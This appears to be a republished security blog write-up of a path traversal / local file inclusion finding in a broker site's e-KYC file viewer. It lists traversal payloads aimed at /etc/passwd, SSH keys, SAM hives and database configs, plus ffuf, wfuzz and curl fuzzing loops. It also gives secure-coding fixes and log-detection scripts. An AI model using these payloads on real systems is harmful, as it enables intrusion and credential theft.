Introduction:
Local File Inclusion (LFI) vulnerabilities remain a pervasive and high-severity threat in web application security. These flaws allow attackers to read sensitive files on a server, potentially leading to full system compromise. This article dissects a real-world LFI discovery in a broker web application, demonstrating how a seemingly secure image upload feature became a gateway to exposing critical system data.
Learning Objectives:
- Understand the fundamental mechanics of Local File Inclusion and Path Traversal vulnerabilities.
- Learn a systematic methodology for identifying and exploiting LFI vulnerabilities in web applications.
- Implement robust mitigation strategies to secure file inclusion functionalities in your own applications.
You Should Know:
1. The Anatomy of an LFI Vulnerability
Local File Inclusion occurs when a web application insecurely incorporates files from the server’s file system. Unlike Remote File Inclusion (RFI), LFI focuses on accessing local files through improper input validation. The vulnerability typically manifests in parameters that control file paths, such as the `req` parameter discovered in the broker application. When user input is not properly sanitized, attackers can manipulate these parameters using directory traversal sequences (../) to escape the intended directory and access arbitrary files. This fundamental security flaw transforms a benign file viewer into a powerful data exfiltration tool.
Step-by-step guide explaining what this does and how to use it:
- Identify file inclusion parameters in URLs (e.g., ?file=, ?page=, ?req=)
- Test basic traversal: `../../../etc/passwd`
- Observe server responses for error messages or file content
- Escalate by accessing sensitive files like /etc/shadow, configuration files, or application source code
2. Reconnaissance and Application Mapping
Before exploitation comes thorough reconnaissance. The initial phase involves mapping the application’s functionality to identify potential attack vectors. In this case, the e-KYC section’s image upload feature presented the perfect entry point. Comprehensive application crawling reveals endpoints that handle file operations, particularly those that accept user-controlled parameters for file retrieval. Understanding the application’s directory structure is crucial for effective traversal attempts.
Step-by-step guide explaining what this does and how to use it:
- Use automated scanners like Burp Suite or OWASP ZAP to crawl the application
- Manually explore all application features, especially file upload/download functionality
- Intercept requests with a proxy to identify parameters passed to the server
- Document all endpoints that handle file operations for targeted testing
3. Crafting Effective Path Traversal Payloads
Successful LFI exploitation requires precise payload construction. The initial failure with `../etc/passwd` demonstrates the importance of understanding the application’s current directory context. The successful payload `../../../../../etc/passwd` used multiple traversal sequences to navigate from the upload directory to the root filesystem. Different operating systems and application configurations require tailored payloads, including URL encoding, absolute path references, and null byte injection in legacy systems.
Step-by-step guide explaining what this does and how to use it:
- Start with basic traversal: `../../../etc/passwd`
- Increment traversal depth: `../../../../../../etc/passwd`
- URL encode special characters: `..%2f..%2f..%2fetc%2fpasswd`
- Try absolute paths: `/etc/passwd`
- For Windows systems: `..\..\..\windows\system32\drivers\etc\hosts`
4. Advanced LFI Exploitation Techniques
Beyond reading basic system files, LFI can be leveraged for more sophisticated attacks. When file upload functionality exists alongside LFI, attackers can upload malicious files and then include them to achieve remote code execution. Even without upload capabilities, LFI can expose application source code, configuration files containing database credentials, and log files that might be poisoned to execute commands.
Step-by-step guide explaining what this does and how to use it:
- Access application configuration files: `../../../../application/config/database.php`
- Read web server logs: `../../../../var/log/apache2/access.log`
- Retrieve PHP session files: `../../../../tmp/sess_`
- Access SSH keys: `../../../../.ssh/id_rsa`
- Read Windows registry hives: `..\..\..\windows\system32\config\sam`
5. Automated LFI Testing with Command-Line Tools
While manual testing is essential, automation can enhance efficiency and coverage. Tools like ffuf and wfuzz can systematically test for LFI vulnerabilities by fuzzing parameters with extensive payload lists. Custom scripts can automate the process of testing various traversal depths and encoding techniques across multiple parameters simultaneously.
Linux commands for automated testing:
# Using ffuf to fuzz for LFI (-fs 0 filters out empty responses)
ffuf -u "https://target.com/e-kyc/file/view/?req=FUZZ" -w lfi-payloads.txt -fs 0
# Using wfuzz with a payload list that mixes encoding techniques (--hc 404 hides not-found responses)
wfuzz -z file,traversal_payloads.txt --hc 404 "https://target.com/e-kyc/file/view/?req=FUZZ"
# Custom curl loop for testing multiple traversal depths
for i in {1..10}; do
    payload=$(printf '../%.0s' $(seq 1 "$i"))"etc/passwd"
    curl -s "https://target.com/e-kyc/file/view/?req=$payload" | grep -q "root:" && echo "Vulnerable with depth $i"
done
6. Secure Coding Practices to Prevent LFI
Mitigating LFI vulnerabilities requires a multi-layered approach to input validation and file access control. Applications should implement whitelist-based validation for allowed files, avoid direct user input in file paths, and utilize indirect resource mapping. Proper server hardening, including running applications with minimal privileges and implementing strict directory permissions, provides additional protection layers.
Implementation examples:
<?php
// Secure PHP implementation - whitelist approach
$allowed_files = array('profile.jpg', 'document.pdf', 'contract.docx');
$requested_file = $_GET['req'] ?? '';
// Strict comparison: only an exact whitelisted name is accepted
if (in_array($requested_file, $allowed_files, true)) {
    // Serve the bytes; do not include() user-selectable files, which would execute any PHP inside them
    readfile('/secure/uploads/path/' . basename($requested_file));
} else {
    http_response_code(400);
    die('Invalid file request');
}

// Secure Java implementation - resource mapping (servlet handler)
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Map;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
// User input selects a key; only the server-side map decides the real path
static final Map<String, String> FILE_MAP = Map.of("profile", "/uploads/profile.jpg", "document", "/uploads/document.pdf");
void serveFile(HttpServletRequest request, HttpServletResponse response) throws java.io.IOException {
    String fileKey = request.getParameter("req");
    String filePath = fileKey == null ? null : FILE_MAP.get(fileKey); // Map.of rejects null keys
    if (filePath != null) {
        Files.copy(Paths.get(filePath), response.getOutputStream());
    } else {
        response.sendError(HttpServletResponse.SC_NOT_FOUND); // unknown key: file system untouched
    }
}
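As an added illustration (not code from the original write-up), the following Python models the path arithmetic behind sections 1, 3 and 6: why a single `../` from the upload directory missed `/etc/passwd` while a deeper payload reached it, and a containment check that complements the whitelist approach above. `UPLOAD_ROOT` is an assumed placeholder and the resolution is pure string work, so it runs without touching the file system.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

# Assumed upload directory of the file viewer (placeholder, borrowed from the PHP example above).
UPLOAD_ROOT = "/secure/uploads/path"


def naive_resolve(req: str) -> str:
    """Vulnerable pattern: glue the user-supplied name onto the base directory and normalise."""
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, req))


def safe_resolve(req: str) -> Optional[str]:
    """Hardened: decode once, reject odd bytes and absolute paths, normalise, then require the
    result to stay strictly inside UPLOAD_ROOT. Real code should also realpath() against symlinks."""
    decoded = unquote(req)
    if "\x00" in decoded or "\\" in decoded or posixpath.isabs(decoded):
        return None
    candidate = posixpath.normpath(posixpath.join(UPLOAD_ROOT, decoded))
    # commonpath compares whole components, so '/secure/uploads/pathological' is not accepted
    if candidate == UPLOAD_ROOT or posixpath.commonpath([UPLOAD_ROOT, candidate]) != UPLOAD_ROOT:
        return None
    return candidate


if __name__ == "__main__":
    # One '../' only climbs into a sibling directory: this is why the first probe missed
    print(naive_resolve("../etc/passwd"))              # /secure/uploads/etc/passwd
    # Three levels reach '/', and surplus '../' at the root are dropped, so five works as well
    print(naive_resolve("../../../../../etc/passwd"))  # /etc/passwd
    print(naive_resolve("/etc/passwd"))                # an absolute path replaces the base entirely
    for probe in ("profile.jpg", "../../../../../etc/passwd",
                  "..%2f..%2f..%2fetc%2fpasswd", "/etc/passwd", "..\\..\\windows\\win.ini"):
        print(f"{probe!r:45} -> {safe_resolve(probe)}")
```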
7. Detection and Monitoring for LFI Attacks
Proactive security monitoring can detect LFI attempts before they cause damage. Web application firewalls (WAFs) should be configured with rules to detect traversal sequences in URLs and parameters. Server access logs should be monitored for patterns indicating LFI probes, and file integrity monitoring should alert on unauthorized access to sensitive system files.
Linux commands for log monitoring:
# Search Apache logs for traversal attempts (plain, URL-encoded and Windows-style)
grep -iE '\.\./|%2e%2e|\.\.\\' /var/log/apache2/access.log
# Monitor for reads of sensitive files
auditctl -w /etc/passwd -p r -k sensitive_file_access
auditctl -w /etc/shadow -p r -k sensitive_file_access
# Real-time alerting for LFI patterns (set ALERT_EMAIL to your alerting address)
tail -f /var/log/nginx/access.log | grep --line-buffered -F '../' | while read -r line; do
    echo "LFI Attempt: $line" | mail -s "LFI Alert" "$ALERT_EMAIL"
done
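A plain `grep` for `../` misses double-encoded probes such as `%252e%252e`. As an added example (not from the original post), this Python scanner parses combined-format access-log lines, URL-decodes each query parameter until it stops changing, and flags traversal depth, absolute paths and null bytes, marking 2xx responses as likely successful reads; the log lines are constructed samples.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample access-log lines (combined format); not taken from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [10/May/2025:10:01:02 +0000] "GET /e-kyc/file/view/?req=profile.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2025:10:01:09 +0000] "GET /e-kyc/file/view/?req=../etc/passwd HTTP/1.1" 404 221 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2025:10:01:15 +0000] "GET /e-kyc/file/view/?req=../../../../../etc/passwd HTTP/1.1" 200 1847 "-" "Mozilla/5.0"
203.0.113.7 - - [10/May/2025:10:01:21 +0000] "GET /e-kyc/file/view/?req=..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1847 "-" "curl/8.0"
198.51.100.4 - - [10/May/2025:10:02:00 +0000] "GET /e-kyc/file/view/?req=contract.docx HTTP/1.1" 200 40960 "-" "Mozilla/5.0"
"""

# Combined-format request line: client IP, timestamp, method, request target, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def fully_decode(value: str, rounds: int = 3) -> str:
    """URL-decode until stable so double-encoded payloads (%252e%252e) are caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line: str):
    """Return a finding dict if any query parameter carries a traversal, absolute-path or null-byte payload."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for name, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        decoded = fully_decode(raw).replace("\\", "/")  # fold Windows separators into one form
        depth = decoded.count("../")
        if depth == 0 and not decoded.startswith("/") and "\x00" not in decoded:
            continue
        return {"ip": m["ip"], "param": name, "decoded": decoded, "depth": depth,
                "status": m["status"],
                # a 2xx answer to a traversal probe means the server most likely served the file
                "likely_success": m["status"].startswith("2")}
    return None


def scan_log(text: str) -> list:
    return [f for f in (inspect_line(line) for line in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['param']}={f['decoded']!r} depth={f['depth']} status={f['status']} success={f['likely_success']}")
```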
What Undercode Say:
- The line between Path Traversal and LFI is often blurred, but both demonstrate critical input validation failures that demand immediate remediation.
- This case study exemplifies how proper security testing methodology transforms seemingly minor findings into significant security discoveries with substantial impact potential.
The discovery detailed in the original post, while correctly identified as a Path Traversal vulnerability that enabled Local File Inclusion, highlights a fundamental security testing truth: persistence and methodology trump isolated technical knowledge. The researcher’s systematic approach—from initial reconnaissance through incremental exploitation—demonstrates the mindset required for effective security assessment. The debate in the comments regarding vulnerability classification, while academically interesting, misses the larger point: regardless of terminology, the vulnerability exposed sensitive system information through improper input validation. This case reinforces that security controls must be defense-in-depth, combining proper input validation, least privilege access, and continuous monitoring. Organizations should prioritize training developers on secure coding practices while implementing robust security testing throughout the development lifecycle.
Prediction:
The sophistication of LFI exploitation will continue evolving, with increased automation and integration into attack toolkits making these vulnerabilities more dangerous. As applications migrate to cloud-native architectures and containerized environments, LFI flaws may provide initial footholds that enable lateral movement across distributed systems. The growing adoption of serverless computing and microservices architectures introduces new attack surfaces where traditional LFI mitigation strategies may prove insufficient. Future LFI attacks will likely combine with other vulnerabilities to create attack chains that bypass individual security controls, emphasizing the need for comprehensive security testing and runtime protection across entire application ecosystems.
Reported By: Sachin Mishra29 – Hackers Feeds